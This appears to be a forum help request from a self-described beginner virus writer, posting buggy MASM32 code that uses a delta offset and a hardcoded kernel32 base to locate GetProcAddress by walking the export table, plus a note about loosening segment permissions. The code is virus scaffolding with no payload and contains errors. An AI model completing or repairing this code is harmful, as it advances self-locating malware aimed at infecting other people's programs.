man I read the articles and find out the ways to get the kernel32
base address on the hardcorded method and I done some GetProcAddress
search . But the problem in this is I got an exception . why was
that ?
my code is this .
First I write the code but the variables in the code segment are
read only thus I changet that segment attributes and try again
already then in I debugging on the ollydebug it faills when it scans
the 2Dh element of the export table of the Kernel32.dll what a fuck
is this ? Please help me man please ... Please ... I'm very curious
now . I just cant breath without assembly now . Please man help me
give me some drugs .


This is my source code .
------------------------------------------------code begins ------

.586
.model flat , stdcall
option casemap : none
include c:\masm32\include\kernel32.inc
includelib c:\masm32\lib\kernel32.lib
include c:\masm32\include\user32.inc
includelib c:\masm32\lib\user32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


.code
start:
call GetDelta
GetDelta:
pop ebp
sub ebp , OFFSET GetDelta - OFFSET start
XPKernel32BaseAddress equ 77E60000h
mov eax , XPKernel32BaseAddress
call CheckForK32
cmp eax , 0000000h
jne ExitLoop
mov eax , XPKernel32BaseAddress
call GetApiAddress
;; now we are going to print a messageBox
invoke ExitProcess , 0





ExitLoop:
;; return to the host code in our virus .

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;




;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CheckForK32 proc
cmp word ptr [ eax ] , 'ZM'
jne NotFound
add eax , 3ch
mov eax , [eax]
add eax , XPKernel32BaseAddress
cmp word ptr [ eax ] , 'EP'
jne NotFound
xor eax , eax
ret
NotFound:
;; die
CheckForK32 endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
aPEHelder dd 0
aimportDir dd 0
aAddressTable dd 0
aNameTable dd 0
aOrdinalTable dd 0
nOfExports dd 0
sGetProcAddress db 'GetProcAddress' ,0
aGetProcAddress dd 0

GetApiAddress proc
;; oky now we have to get the PE real address
mov eax , [eax+3ch]
mov [ebp + (OFFSET aPEHelder - OFFSET start) ] , eax
add eax , XPKernel32BaseAddress
mov [ebp+( OFFSET aPEHelder- OFFSET start) ] , eax
;; now there is PE helder address in the eax
;; we shall play with it .
;; Then we need is the place where VA of import dir is kept
;; it is on the 78h
add eax , 78h
mov eax,dword ptr [ eax ]
add eax , XPKernel32BaseAddress
push eax
mov [ebp + (OFFSET aimportDir- OFFSET start) ] , eax
;;oky we are pointed to the import table in eax
;; oky then get the addresstableRVA
add eax , 1ch
mov eax , [eax]
add eax , XPKernel32BaseAddress
mov dword ptr [ebp + (OFFSET aAddressTable-OFFSET start)] , eax
pop eax
;; oky now we shoud have the Name PTR table
push eax
add eax , 20h
mov eax , dword ptr [eax]
add eax , XPKernel32BaseAddress
mov dword ptr [ebp + (OFFSET aNameTable - OFFSET start) ] , eax
pop eax
push eax
;;Now we should get the Ordinal table
add eax , 24h
mov eax , dword ptr [eax]
add eax , XPKernel32BaseAddress
mov dword ptr [ ebp+ ( OFFSET aOrdinalTable - OFFSET start)] ,
eax
pop eax
push eax
;; now we have to get nunber of exports
add eax , 18h
mov eax , dword ptr [eax]
mov dword ptr [ebp + (OFFSET nOfExports- OFFSET start) ] , eax
mov ecx , eax
pop eax

;; Now we have to search for the APIs , Lets go
;; we shoud put the nOfExports to the ecx oky
;; virus leavaman sanaseama laba! .
mov eax , dword ptr [ ebp + (OFFSET aNameTable - OFFSET start)]
;; now the eax is pointed to the first address of the string
name
mov edx , 0
lea esi , [ebp +(OFFSET sGetProcAddress- OFFSET start)]
mov ebx , esi
CheckNext:
push edx
shl edx , 2
add eax , edx
pop edx
mov edi , dword ptr [ eax ]
add edi , XPKernel32BaseAddress
inc edx
mov esi , ebx
CheckByte:
;; we have to compare the bytes in EDI with ESI
cmpsb
jne CheckNext
cmp byte ptr [esi] , 0
je GotIt
cmp edx , ecx
je ExitLoop ;; what a shitt this is not kernel32 what a
fuck .
jmp CheckByte
GotIt:
;; oky we now get that shitt . Oky now we have to store this
shitt
;; its on the count of edx +1
;; but in the loop it was already incremented .This is where
aAddressTable was need
mov eax , [ebp + (OFFSET aAddressTable - OFFSET start) ]
mov eax , [eax]
push edx
shl edx , 2
add eax , edx
pop edx
mov eax , [eax]
mov [ebp + (OFFSET aGetProcAddress-OFFSET start) ] , eax
xor eax , eax
xor edx , edx
ret
GetApiAddress endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
end start

--------------------------------------------------------------------
please make sure to changet the attributes on the segments to full
access in order to avoid memory access violations under ollydbg.


oky man please help me man . I just a beaganner to the assembly
langaueg and virus writing . I need to go to the hell .
by : sanzilla jackcat

sandundhammikaperera@...